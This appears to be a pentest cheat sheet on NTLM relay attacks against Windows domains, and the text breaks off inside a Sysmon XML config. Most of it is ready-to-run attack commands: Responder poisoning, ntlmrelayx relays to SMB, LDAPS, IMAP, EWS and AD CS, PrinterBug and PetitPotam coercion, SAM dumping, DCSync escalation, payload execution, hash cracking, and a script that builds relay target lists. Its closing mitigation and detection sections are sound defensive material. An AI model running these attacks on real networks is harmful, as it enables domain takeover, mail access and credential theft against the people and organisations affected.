🔄 NTLM Relay Attacks
🧠 Description
NTLM relay (sometimes called an NTLM man-in-the-middle attack) is a technique where an attacker receives an NTLM authentication attempt from a victim and forwards the exchange, message by message, to a target service of the attacker's choosing. The target sees a valid NTLM authentication and the attacker ends up with a session as the victim, without ever knowing the victim's password, recovering the NT hash, or cracking the captured Net-NTLMv2 response.
- Challenge-Response: NTLM is challenge-response; the attacker forwards the server's challenge to the victim and the victim's response back to the server, so no secret is needed to complete the exchange
- No Target Binding: plain NTLM does not tie the authentication to the server the client thinks it is talking to, so the response is valid for whichever server issued the challenge
- Auto-Auth: Windows clients send NTLM automatically (SMB, WebDAV, WPAD, intranet-zone browsers), and name-resolution poisoning or authentication coercion triggers it on demand
- Legacy Compatibility: SMB, HTTP(S), LDAP(S), MSSQL, SMTP, IMAP and RPC all accept NTLM
- Cross-Protocol: an authentication received over one protocol (for example HTTP) can be relayed to another (for example LDAP or SMB), subject to the signing and channel-binding requirements of the target
Attack Flow:
- Attacker gets a victim to connect to a listener they control (LLMNR/NBT-NS poisoning, a UNC link, WPAD, or coercion)
- Victim starts NTLM authentication to the attacker; the attacker opens a connection to the target and forwards NEGOTIATE, passes the target's CHALLENGE back to the victim, and forwards the victim's AUTHENTICATE (the attacker could also just capture the Net-NTLMv2 response and crack it offline, but relaying needs no cracking)
- Target server validates the response against the victim's NT hash and grants the attacker's connection a session as the victim
- Attacker drives that session (command execution, file access, LDAP changes) while the victim sees a failed or oddly slow logon at most
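To make the flow above concrete, here is an added simulation (not code from Responder or Impacket) that runs the real NTLMv2 computations from MS-NLMP 3.3.2 through a client, a relay and a server. The user, domain, password, challenge and timestamp values are constructed. It shows that the relay authenticates without the password or NT hash, and why SMB/LDAP signing stops it: the session key is derived from the NT hash, which the relay never sees.

```python
"""NTLM relay simulated end to end with real NTLMv2 arithmetic (MS-NLMP 3.3.2).

Added illustration, not code from Responder/Impacket. Three parties: the client
knows the password, the server (think: the DC) knows the user's NT hash, and the
relay knows nothing but forwards bytes. Names and values are constructed.
"""
import hmac
import os
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is usually disabled under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):
            a = rol((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = rol((a + G(b, c, d) + X[r2[i]] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = rol((a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))            # NTOWFv1, what the DC stores


def ntowf_v2(nthash: bytes, user: str, domain: str) -> bytes:
    """ResponseKeyNT: user name is upper-cased, the domain is left as sent."""
    return hmac.new(nthash, (user.upper() + domain).encode("utf-16-le"), "md5").digest()


def ntlmv2_response(key, server_challenge, client_challenge, timestamp, target_info):
    """Returns (NTProofStr, temp); NtChallengeResponse on the wire is NTProofStr || temp."""
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + target_info + b"\x00" * 4)
    return hmac.new(key, server_challenge + temp, "md5").digest(), temp


def session_base_key(key: bytes, nt_proof: bytes) -> bytes:
    return hmac.new(key, nt_proof, "md5").digest()


def sign(session_key: bytes, seq: int, message: bytes) -> bytes:
    """Simplified NTLMv2 signature: HMAC_MD5(key, seqnum || msg)[:8] (no RC4 wrapping)."""
    return hmac.new(session_key, struct.pack("<I", seq) + message, "md5").digest()[:8]


def simulate_relay(require_signing: bool) -> dict:
    user, domain, password = "alice", "CORP", "password"             # constructed
    server_store = {user: nt_hash(password)}                          # what the server/DC holds
    target_info = b"\x02\x00\x08\x00" + domain.encode("utf-16-le")    # MsvAvNbDomainName AV pair

    # 1-2. NEGOTIATE goes client -> relay -> server; the SERVER picks the challenge.
    server_challenge = os.urandom(8)
    # 3. The relay passes that challenge to the client, which answers it with its secret.
    client_key = ntowf_v2(nt_hash(password), user, domain)
    nt_proof, temp = ntlmv2_response(client_key, server_challenge, os.urandom(8),
                                     133_000_000_000_000_000, target_info)
    authenticate = {"user": user, "domain": domain, "nt_response": nt_proof + temp}

    # 4. The relay forwards AUTHENTICATE untouched; the server recomputes the proof.
    server_key = ntowf_v2(server_store[authenticate["user"]], authenticate["user"], authenticate["domain"])
    proof, blob = authenticate["nt_response"][:16], authenticate["nt_response"][16:]
    authenticated = hmac.compare_digest(hmac.new(server_key, server_challenge + blob, "md5").digest(), proof)
    result = {"authenticated": authenticated}
    if not require_signing:
        result["relay_session_usable"] = authenticated   # plain session: the relay just keeps using it
        return result

    # 5. Signing required: both real parties derive the session key from the NT hash.
    #    The relay saw every byte on the wire and still has nothing to derive it from.
    request = b"SMB2 TREE_CONNECT \\\\dc01\\C$"
    server_sig = sign(session_base_key(server_key, nt_proof), 0, request)
    client_sig = sign(session_base_key(client_key, nt_proof), 0, request)
    relay_sig = sign(b"\x00" * 16, 0, request)            # best the relay can do: guess
    result["client_can_sign"] = hmac.compare_digest(client_sig, server_sig)
    result["relay_session_usable"] = hmac.compare_digest(relay_sig, server_sig)
    return result


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("no signing :", simulate_relay(require_signing=False))
    print("signing    :", simulate_relay(require_signing=True))
```

The MIC that modern clients add to AUTHENTICATE does not change this picture: it is computed with the same session key and protects the three messages from modification, so a relay that forwards them untouched still succeeds; only signing, sealing or channel binding (EPA) on the target tie the session to a key the relay cannot produce.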
⚙️ Relay Setup
Responder Configuration:
```bash
# Edit Responder.conf: turn OFF the servers that ntlmrelayx will provide, so
# Responder only poisons names and the victims' connections land on ntlmrelayx
[Responder Core]
SMB = Off
HTTP = Off

# Responder's fixed server challenge (8 bytes = 16 hex chars); only relevant when
# Responder itself answers and you plan to crack captures with rainbow tables
Challenge = 1122334455667788

# Run Responder (poison LLMNR/NBT-NS/mDNS on eth0, verbose)
sudo python3 Responder.py -I eth0 -v

# Ask clients for LM/NTLMv1 responses; only clients whose policy still allows it comply.
# This is a capture-and-crack option, it has nothing to do with SMBv1 or relaying
sudo python3 Responder.py -I eth0 --lm

# -r answers NetBIOS "wredir" suffix queries; it is NOT a relay mode.
# Relaying is done by ntlmrelayx.py or MultiRelay.py (below)
sudo python3 Responder.py -I eth0 -r
```
ntlmrelayx.py (Impacket):
```bash
# Relay to one SMB target (-smb2support is needed for any modern Windows host)
python3 ntlmrelayx.py -t 10.10.10.100 -smb2support

# Relay to a list of targets (one per line, optional protocol prefix such as ldaps://)
python3 ntlmrelayx.py -tf targets.txt -smb2support

# Keep every relayed session open behind a SOCKS proxy instead of running a one-shot
# action; then drive it with proxychains + impacket tools using -no-pass
python3 ntlmrelayx.py -tf targets.txt -smb2support -socks

# Run a command on every successful SMB relay (relayed user must be a local admin)
python3 ntlmrelayx.py -t 10.10.10.100 -smb2support -c "whoami"

# Relay only what arrives on the HTTP listener and leave port 445 to another tool
# (there is no --http-method or protocol-downgrade switch in ntlmrelayx)
python3 ntlmrelayx.py -t 10.10.10.100 -smb2support --no-smb-server
```
Combined Attack (Responder + ntlmrelayx):
```bash
# Terminal 1: Responder with SMB = Off and HTTP = Off in Responder.conf, so poisoned
# victims connect to ntlmrelayx's listeners on 445 and 80 instead of Responder's
sudo python3 Responder.py -I eth0 -v

# Terminal 2: ntlmrelayx receives those connections and relays them
python3 ntlmrelayx.py -tf targets.txt -smb2support

# Or MultiRelay.py (ships with Responder): SMB relay to a single target;
# -u ALL relays every user, -d dumps hashes on the target
python3 MultiRelay.py -t 10.10.10.100 -u ALL -d
```
🎯 Target Selection
High-Value Targets:
```text
# Domain Controllers
#   SMB: only if signing is not required; DCs require it by default, so SMB relay to a DC normally fails
#   LDAP/LDAPS: signing and channel binding are NOT enforced by default
#   - ACL modification (grant DCSync rights), new user / computer creation, group membership changes
#   - Resource-based constrained delegation on relayed computer accounts
# File Servers (SMB)
#   - Access to sensitive files
#   - SAM dump if the relayed user is a local admin; pivot for more credentials
# Exchange Servers (HTTP/EWS)
#   - Read emails, send as the user, calendar access
# Web Applications (HTTP)
#   - Authenticated session as the victim, access to sensitive data
# MSSQL
#   - Queries as the relayed user, xp_cmdshell if permitted
```
Find Hosts Without SMB Signing:
```bash
# Hosts where SMB signing is not *required* are relay targets
# (nmap prints "disabled", "supported" = enabled but not required, or "required")
nmap --script smb-security-mode -p 445 10.10.10.0/24

# CrackMapExec / NetExec print (signing:True|False) in the banner and can write
# the relay list directly
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
nxc smb 10.10.10.0/24 --gen-relay-list targets.txt

# Single host: read the signing flag from the banner line (no module or --local-auth needed)
crackmapexec smb 10.10.10.100
```
Target File:
```bash
# targets.txt: one target per line; without a prefix ntlmrelayx assumes smb://
10.10.10.100
10.10.10.101
smb://fileserver.corp.com
ldaps://dc01.corp.com

# Serve a WPAD file so browsers hand their NTLM credentials to the HTTP listener
# (-wh is the proxy host to advertise, -wa prompts for auth N times first)
python3 ntlmrelayx.py -tf targets.txt -smb2support -wh attacker.corp.com -wa 2
```
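Both scanners above tell you the same thing in different formats, and the wrong reading of nmap's "supported" (signing enabled but not required, still relayable) is a common mistake. The following added script (not part of nmap, CrackMapExec or Impacket) parses both outputs into an ntlmrelayx target list, keeping a host only when every scan that saw it says signing is not required. The nmap and CrackMapExec sample output embedded below is constructed to mirror the real formats.

```python
"""Build an ntlmrelayx target list from scanner output (added example).

nmap smb-security-mode reports message_signing as one of:
  disabled (dangerous, but default) | supported | required
Only "required" stops a relay. CrackMapExec/NetExec banners carry (signing:True|False).
The sample output below is constructed, not captured from a real network.
"""
import re

NMAP_HOST = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")
NMAP_SIGN = re.compile(r"message_signing:\s*(disabled|supported|required)")
CME_LINE = re.compile(r"^SMB\s+(\S+)\s+445\s+\S+.*\(signing:(True|False)\)")


def relay_targets_from_nmap(text: str) -> dict:
    """Map ip -> True when relayable (signing disabled or merely supported)."""
    result, host = {}, None
    for line in text.splitlines():
        m = NMAP_HOST.match(line)
        if m:
            host = m.group(1)           # remember which host the script output belongs to
            continue
        m = NMAP_SIGN.search(line)
        if m and host:
            result[host] = m.group(1) != "required"
    return result


def relay_targets_from_cme(text: str) -> dict:
    """Map ip -> True when the banner says signing:False."""
    return {m.group(1): m.group(2) == "False"
            for m in map(CME_LINE.match, text.splitlines()) if m}


def write_targets(*scans: dict, scheme: str = "smb") -> list:
    """Merge scans; a host is kept only if every scan that saw it says relayable."""
    merged = {}
    for scan in scans:
        for ip, ok in scan.items():
            merged[ip] = merged.get(ip, True) and ok
    ordered = sorted(merged, key=lambda ip: tuple(map(int, ip.split("."))))
    return [f"{scheme}://{ip}" for ip in ordered if merged[ip]]


NMAP_SAMPLE = """\
Nmap scan report for 10.10.10.100
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: required
Nmap scan report for fs01.corp.com (10.10.10.101)
Host script results:
|_  message_signing: disabled (dangerous, but default)
Nmap scan report for 10.10.10.102
Host script results:
|_  message_signing: supported
"""
CME_SAMPLE = """\
SMB         10.10.10.101    445    FS01             [*] Windows Server 2019 Build 17763 x64 (name:FS01) (domain:corp.com) (signing:False) (SMBv1:False)
SMB         10.10.10.103    445    WS03             [*] Windows 10.0 Build 19041 x64 (name:WS03) (domain:corp.com) (signing:False) (SMBv1:False)
SMB         10.10.10.100    445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.com) (signing:True) (SMBv1:False)
"""


def build_sample() -> list:
    return write_targets(relay_targets_from_nmap(NMAP_SAMPLE), relay_targets_from_cme(CME_SAMPLE))


if __name__ == "__main__":
    print("\n".join(build_sample()))       # paste into targets.txt for ntlmrelayx -tf
```

Feed real output with `relay_targets_from_nmap(open("scan.nmap").read())`; the DC (10.10.10.100) drops out because it requires signing, while 10.10.10.102 stays in despite nmap's "supported".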
💣 Exploitation Techniques
1. SMB to SMB (Lateral Movement):
```bash
# Relay to SMB and run a command; ntlmrelayx creates a service smbexec-style,
# so the relayed user must be a local admin on the target
python3 ntlmrelayx.py -t 10.10.10.100 -smb2support -c "whoami"

# Default action when no -c/-e is given: dump the local SAM (secretsdump logic)
python3 ntlmrelayx.py -t 10.10.10.100 -smb2support

# Relay to every signing-disabled host in the list
# (--escalate-user is an LDAP-only option, see the LDAP section)
python3 ntlmrelayx.py -tf targets.txt -smb2support
```
2. HTTP to SMB (Web to Domain Admin):
```bash
# ntlmrelayx listens on both 445 (SMB) and 80 (HTTP) by default, so an NTLM
# authentication that arrives over HTTP (WebDAV, WPAD, an intranet page that
# references the attacker's host) is relayed to the SMB target with the same command
python3 ntlmrelayx.py -t dc01.corp.com -smb2support -c "whoami"
# Caveat: a DC requires SMB signing by default, so this only works against a DC
# with that policy relaxed; a file server without signing is the realistic target
```
3. LDAP(S) Relay (ACL Abuse):
```bash
# Relay to LDAP. Works against a DC that does not enforce LDAP signing (the default),
# and against LDAPS when channel binding is not enforced (also the default).
# Caveat: an SMB client sets the NTLM "sign" flag, so SMB->LDAP is refused by a DC
# patched for CVE-2019-1040 (--remove-mic only helps on unpatched DCs). Relay
# SMB-sourced auth to LDAPS instead; HTTP-sourced auth works against either.
python3 ntlmrelayx.py -t ldaps://dc01.corp.com -smb2support --escalate-user attacker
# With a privileged relayed user, 'attacker' is granted replication (DCSync) rights
# on the domain object via ACL modification; otherwise the domain is dumped to loot

# Create a new machine account and configure RBCD on the relayed computer account
python3 ntlmrelayx.py -t ldaps://dc01.corp.com -smb2support --delegate-access

# Interactive LDAP shell on the relayed session (add_user, add_user_to_group, ...)
python3 ntlmrelayx.py -t ldaps://dc01.corp.com -smb2support -i
```
4. SMTP/IMAP Relay:
```bash
# SMTP and IMAP are target protocols selected by URL prefix, not by flags
# IMAP: search the relayed user's mailbox for a keyword and dump matching mail
python3 ntlmrelayx.py -t imap://mail.corp.com -smb2support --keyword password
# SMTP: keep the relayed session open as a SOCKS proxy and drive it with any mail client
python3 ntlmrelayx.py -t smtp://mail.corp.com -smb2support -socks
```
5. Exchange EWS Attack:
```bash
# Relay to Exchange Web Services (an HTTP target) and keep the session behind SOCKS;
# then point an EWS client at it through proxychains to read mail as the relayed user
python3 ntlmrelayx.py -t https://exchange.corp.com/EWS/Exchange.asmx -smb2support -socks

# PrivExchange chain: coerce the Exchange server's computer account through an EWS
# push subscription and relay it to LDAP; pre-2019 Exchange held WriteDACL on the
# domain object, so --escalate-user gives the attacker DCSync rights
python3 ntlmrelayx.py -t ldap://dc01.corp.com -smb2support --escalate-user attacker
```
🔐 SMB Relay Details
SMB Signing Check:
```bash
# nmap reports one of three states:
#   message_signing: disabled (dangerous, but default)  -> relayable
#   message_signing: supported                          -> enabled but not required, still relayable
#   message_signing: required                           -> relay to this host fails
nmap -p445 --script smb-security-mode 10.10.10.100

# CrackMapExec shows (signing:True|False) in its banner; --local-auth is not needed for this
crackmapexec smb 10.10.10.100
```
SMBEXEC-style Relay:
```bash
# Upload and run a binary on the target (service creation, needs local admin)
python3 ntlmrelayx.py -t 10.10.10.100 -smb2support -e payload.exe

# There is no --exec-method switch: -c and -e always use the smbexec-style service path.
# For other tooling, keep the session with -socks and use impacket through it with
# -no-pass (the password is never needed; the relayed session is already authenticated)
python3 ntlmrelayx.py -t 10.10.10.100 -smb2support -socks
proxychains python3 smbexec.py corp.com/victim@10.10.10.100 -no-pass
proxychains python3 secretsdump.py corp.com/victim@10.10.10.100 -no-pass
# wmiexec.py does not work over a relayed SMB session: DCOM needs 135 plus dynamic ports
```
Hash Dumping via Relay:
```bash
# Dump the local SAM from the relay target (default action when no -c/-e is given;
# needs local admin rights; loot is written to the -l directory)
python3 ntlmrelayx.py -t 10.10.10.100 -smb2support -l loot

# DCSync over a relayed session is not something to count on: DRSUAPI is normally
# reached with RPC packet privacy, which needs the NTLM session key the relay never
# gets. The reliable chain is: relay to LDAP so 'attacker' is granted replication
# rights, then DCSync with the attacker's own credentials
python3 ntlmrelayx.py -t ldaps://dc01.corp.com -smb2support --escalate-user attacker
python3 secretsdump.py -just-dc corp.com/attacker@dc01.corp.com
python3 secretsdump.py -just-dc -hashes :ntlmhash corp.com/attacker@dc01.corp.com
```
🎭 Authentication Coercion
PrinterBug (SpoolSample):
```bash
# MS-RPRN RpcRemoteFindFirstPrinterChangeNotification: any domain user can make a
# host that runs the Print Spooler authenticate, as its machine account, to a host
# of the attacker's choosing. The Spooler is on by default on most Windows servers.
# From Linux (printerbug.py from the krbrelayx repo): <creds@target> <listener>
python3 printerbug.py corp.com/attacker:password@printserver.corp.com 10.10.10.50
# From Windows: SpoolSample.exe <target> <listener>
SpoolSample.exe printserver.corp.com attacker-host
# printserver$ now authenticates (SMB) to 10.10.10.50
```
PrinterBug + NTLM Relay:
```bash
# The coerced account is the machine account (printserver$). It has no admin rights on
# the DC, and DC SMB signing blocks the relay anyway, so relaying it to SMB on the DC
# gains nothing. Relay it to LDAPS instead (LDAP refuses SMB-sourced auth on patched DCs).

# Terminal 1: relay to LDAPS and configure resource-based constrained delegation on
#             PRINTSERVER; ntlmrelayx creates a new machine account and prints its password
python3 ntlmrelayx.py -t ldaps://dc01.corp.com -smb2support --delegate-access

# Terminal 2: coerce printserver$ to authenticate to the relay
python3 printerbug.py corp.com/attacker:password@printserver.corp.com 10.10.10.50

# Then impersonate an admin to PRINTSERVER via S4U2Proxy with that new account
# (NEWPC$ / NewPass are placeholders for what ntlmrelayx printed)
python3 getST.py -spn cifs/printserver.corp.com -impersonate Administrator 'corp.com/NEWPC$:NewPass'
# Result: code execution as Administrator on printserver, not on the DC
```
PetitPotam Alternative:
```bash
# PetitPotam (MS-EFSR) coerces the target's machine account; unpatched DCs even
# accept it unauthenticated. Syntax: PetitPotam.py [-u USER -p PASS -d DOMAIN] <listener> <target>
python3 PetitPotam.py -u attacker -p password -d corp.com 10.10.10.50 dc01.corp.com

# Relaying dc01$ back to the DC itself is pointless; the classic combination is to
# relay it to AD CS web enrollment (ESC8) and obtain a certificate for the DC account
python3 ntlmrelayx.py -t http://ca.corp.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
```
🛡️ Defense Evasion
NTLMv2 Downgrade:
```bash
# A client that enforces NTLMv2 (LmCompatibilityLevel >= 3, the modern default) cannot
# be forced down. Responder can only *ask* for LM/NTLMv1; clients whose policy still
# allows it will comply. NTLMv1 responses crack quickly, and with Extended Session
# Security disabled they reduce to DES and give back the NT hash itself (usable for PtH)
sudo python3 Responder.py -I eth0 --lm            # request LM/NTLMv1 responses
sudo python3 Responder.py -I eth0 --disable-ess   # NTLMv1 without ESS
# (ntlmrelayx has no downgrade option; it relays whatever the client sends)

# Crack Net-NTLMv1
hashcat -m 5500 hash.txt wordlist.txt
john --format=netntlm hash.txt
# Net-NTLMv2, the normal case, is hashcat -m 5600 / john --format=netntlmv2
```
SMB Cross-Protocol Relay:
```bash
# SMB -> LDAP: refused by patched DCs because the SMB client sets the NTLM sign flag
# (CVE-2019-1040 closed the --remove-mic workaround); use LDAPS, which ignores that
# flag unless channel binding is enforced
python3 ntlmrelayx.py -t ldaps://dc01.corp.com -smb2support --delegate-access

# HTTP -> SMB: the HTTP listener is on by default, there is no -http flag
python3 ntlmrelayx.py -t smb://fileserver.corp.com -smb2support

# Across a trust: the target DC must accept the relayed account (trust in the right
# direction) and the same signing / channel-binding rules apply
python3 ntlmrelayx.py -t ldaps://dc01.other-domain.com -smb2support
```
💥 Impact
- Domain Admin: relay a privileged user to a host without signing and run commands as them
- Hash Dumping: SAM from relayed hosts; every domain hash once an LDAP relay has granted DCSync rights
- Email Access: read mail as the relayed user via Exchange/EWS or IMAP
- ACL Modification: grant yourself rights on the domain object, add computers, configure RBCD
- File Access: read any share the victim can, without credentials of your own
🛡️ Mitigation
- Require SMB Signing: on all workstations and servers, not only on domain controllers
- Require LDAP Signing and LDAPS Channel Binding: on every domain controller
- Disable NTLM: prefer Kerberos; where NTLM must stay, audit it first to see what breaks
- Extended Protection for Authentication: enable EPA (and HTTPS only) on IIS, EWS and AD CS web enrollment
- Restrict NTLM: deny incoming and outgoing NTLM at domain level once auditing shows it is safe
- Block outbound SMB and WebDAV from servers so coerced authentication never leaves, and disable the Print Spooler where it is not needed
Enable SMB Signing via Group Policy:
```powershell
# GPO: Computer Configuration > Policies > Windows Settings > Security Settings >
#      Local Policies > Security Options >
#        Microsoft network client: Digitally sign communications (always) = Enabled
#        Microsoft network server: Digitally sign communications (always) = Enabled
# Equivalent registry values (RequireSecuritySignature = 1 means "required")
# Client side
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "RequireSecuritySignature" -Value 1 -Type DWord
# Server side
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 1 -Type DWord
# Verify
Get-SmbServerConfiguration | Select-Object RequireSecuritySignature
Get-SmbClientConfiguration | Select-Object RequireSecuritySignature
```
Disable NTLM via Network Security:
```powershell
# GPO: Computer Configuration > Policies > Windows Settings > Security Settings >
#      Local Policies > Security Options >
#        Network security: Restrict NTLM: Audit NTLM authentication in this domain   (do this first)
#        Network security: Restrict NTLM: NTLM authentication in this domain = Deny for domain servers / Deny all
#        Network security: Restrict NTLM: Incoming NTLM traffic / Outgoing NTLM traffic to remote servers
#        Network security: LAN Manager authentication level = Send NTLMv2 response only. Refuse LM & NTLM
gpupdate /force
# Verify what would break before denying: audit events 8001-8004 in
# Applications and Services Logs > Microsoft > Windows > NTLM > Operational
Get-WinEvent -LogName "Microsoft-Windows-NTLM/Operational" -MaxEvents 50
```
Block Printer Bug:
```powershell
# Disable the Print Spooler where it is not needed (domain controllers, most servers)
Stop-Service Spooler
Set-Service -Name Spooler -StartupType Disabled
# Or via GPO: Computer Configuration > Policies > Windows Settings > Security Settings >
#             System Services > Print Spooler = Disabled
# Stop the server from making outbound SMB connections, so coerced authentication
# cannot leave the host. Do not block 135 outbound wholesale: that breaks RPC-based
# management; the authentication you care about travels over 445
New-NetFirewallRule -DisplayName "Block outbound SMB" -Direction Outbound -Protocol TCP -RemotePort 445 -Action Block
# PetitPotam: apply the MS-EFSR patches and the AD CS / EPA guidance in KB5005413
```
🔍 Detection
Windows Event ID Monitoring:
```powershell
# Event ID 4624 with LogonType 3 (network) and AuthenticationPackageName NTLM = NTLM network logon.
# Relay indicator: WorkstationName (copied from the victim's NTLM AUTHENTICATE message)
# does not match the IpAddress the connection actually came from; also one IpAddress
# logging on as many accounts, or as machine accounts ($), within a short window.
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} |
  ForEach-Object {
    $x = [xml]$_.ToXml()
    $d = @{}
    $x.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
    [pscustomobject]@{ Time = $_.TimeCreated; User = $d.TargetUserName; Type = $d.LogonType
                       Pkg = $d.AuthenticationPackageName; Workstation = $d.WorkstationName; IP = $d.IpAddress }
  } |
  Where-Object { $_.Type -eq '3' -and $_.Pkg -eq 'NTLM' } |
  Group-Object IP |
  Where-Object { ($_.Group.User | Sort-Object -Unique).Count -ge 3 } |
  Select-Object Name, Count, @{ n = 'Users'; e = { ($_.Group.User | Sort-Object -Unique) -join ',' } }
```
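The same two indicators, as an added detection example that is not part of the original page: it parses 4624 events in their EVTX XML form and flags (a) a WorkstationName whose inventory IP differs from the IpAddress on the logon and (b) one source IP authenticating as several accounts to several hosts inside a five-minute window. The events and the hostname-to-IP inventory are constructed; in practice the inventory comes from DHCP leases, DNS or a CMDB export, and the events from `Get-WinEvent`/`.ToXml()` or a SIEM.

```python
"""Hunt NTLM relay indicators in Windows 4624 events (added example; the events
and the asset inventory below are constructed, not real logs).

Relay leaves two traces in 4624 on the *target* host:
  * WorkstationName comes from the victim's NTLM AUTHENTICATE message and names
    the real client, while IpAddress is the relay's socket address.
  * A single IpAddress logging on as several accounts (often machine accounts
    from coerced authentication) to several hosts within minutes.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime, timedelta

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Hostname -> expected IP (constructed; in practice DHCP leases, DNS or a CMDB export)
INVENTORY = {"WS01": "10.10.10.21", "WS02": "10.10.10.22", "PRINT01": "10.10.10.30"}


def event_4624(time, target, user, workstation, ip, package="NTLM", logon_type="3"):
    """Render a minimal 4624 event in EVTX XML form (constructed sample data)."""
    return f"""<Event xmlns="{NS['e']}"><System><EventID>4624</EventID>
<TimeCreated SystemTime="{time}"/><Computer>{target}</Computer></System><EventData>
<Data Name="TargetUserName">{user}</Data><Data Name="LogonType">{logon_type}</Data>
<Data Name="AuthenticationPackageName">{package}</Data>
<Data Name="WorkstationName">{workstation}</Data><Data Name="IpAddress">{ip}</Data>
</EventData></Event>"""


def parse_4624(xml_text):
    root = ET.fromstring(xml_text)
    stamp = root.find("e:System/e:TimeCreated", NS).get("SystemTime")
    ev = {"target_host": root.findtext("e:System/e:Computer", namespaces=NS),
          "time": datetime.fromisoformat(stamp.replace("Z", "+00:00"))}
    for d in root.iterfind("e:EventData/e:Data", NS):
        ev[d.get("Name")] = d.text or ""
    return ev


def detect_relay(events, window=timedelta(minutes=5), min_accounts=3):
    findings, by_ip = [], defaultdict(list)
    for ev in events:
        if ev.get("LogonType") != "3" or ev.get("AuthenticationPackageName") != "NTLM":
            continue                      # only NTLM network logons can be relayed
        ws, ip = ev.get("WorkstationName", ""), ev.get("IpAddress", "")
        if ip in ("", "-", "127.0.0.1", "::1"):
            continue                      # local logons carry no usable source address
        expected = INVENTORY.get(ws.upper())
        if expected and expected != ip:   # victim's name, relay's address
            findings.append({"rule": "workstation_ip_mismatch", "account": ev["TargetUserName"],
                             "workstation": ws, "ip": ip, "target": ev["target_host"]})
        by_ip[ip].append(ev)
    for ip, evs in by_ip.items():         # fan-out: many accounts, many targets, one source
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            in_window = [e for e in evs[i:] if e["time"] - first["time"] <= window]
            accounts = {e["TargetUserName"] for e in in_window}
            targets = {e["target_host"] for e in in_window}
            if len(accounts) >= min_accounts and len(targets) >= 2:
                findings.append({"rule": "account_fanout", "ip": ip,
                                 "accounts": sorted(accounts), "targets": sorted(targets)})
                break
    return findings


SAMPLE_EVENTS = [  # constructed: 10.10.10.50 plays the relay host
    event_4624("2024-05-01T10:00:00Z", "FS01.corp.com", "alice", "WS01", "10.10.10.21"),         # normal
    event_4624("2024-05-01T10:00:30Z", "FS01.corp.com", "dave", "-", "10.10.10.22", "Kerberos"),  # ignored
    event_4624("2024-05-01T10:01:00Z", "DC01.corp.com", "alice", "WS01", "10.10.10.50"),         # relayed
    event_4624("2024-05-01T10:01:10Z", "DC01.corp.com", "PRINT01$", "PRINT01", "10.10.10.50"),   # coerced
    event_4624("2024-05-01T10:02:00Z", "FS01.corp.com", "bob", "WS02", "10.10.10.50"),           # relayed
    event_4624("2024-05-01T10:03:00Z", "FS01.corp.com", "carol", "WS09", "10.10.10.50"),         # unknown host
]


def hunt(xml_events=SAMPLE_EVENTS):
    return detect_relay([parse_4624(x) for x in xml_events])


if __name__ == "__main__":
    for finding in hunt():
        print(finding)
```

The mismatch rule is the higher-fidelity one (it needs only one event), but it depends on the inventory being current; the fan-out rule needs no inventory and also catches the case where the relay host is itself a domain-joined machine the attacker compromised.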
Network-Based Detection:
```text
# Monitor for:
# - One source IP opening SMB/LDAP sessions to many targets in a short window
# - Workstation-to-workstation SMB (clients normally talk to servers, not to peers)
# - NTLM network logons for machine accounts ($) from an address that is not that machine
# - LLMNR/NBT-NS/mDNS answers from unexpected hosts (Responder) and sudden WPAD lookups
# - LDAP binds that negotiated NTLM without signing or channel binding
# Zeek/Suricata: Zeek's ntlm.log records the client hostname and server name per NTLM
# exchange; a server-side entry whose client hostname does not resolve to the source IP
# is the relay pattern on the wire
```
Sysmon Configuration:
```xml
<Sysmon schemaversion="4.50">
  <EventFiltering>
    <RuleGroup name="NTLM relay tooling" groupRelation="or">
      <!-- Event 3: processes on this host connecting to relay-relevant ports elsewhere.
           Noisy on its own; scope it by Image or exclude management hosts in production -->
      <NetworkConnect onmatch="include">
        <DestinationPort condition="is">445</DestinationPort>
        <DestinationPort condition="is">88</DestinationPort>
        <DestinationPort condition="is">389</DestinationPort>
        <DestinationPort condition="is">636</DestinationPort>
      </NetworkConnect>
      <!-- Event 1: known poisoner/relay tool names. Only catches them when run on a
           Windows host; Responder and ntlmrelayx usually run from Linux -->
      <ProcessCreate onmatch="include">
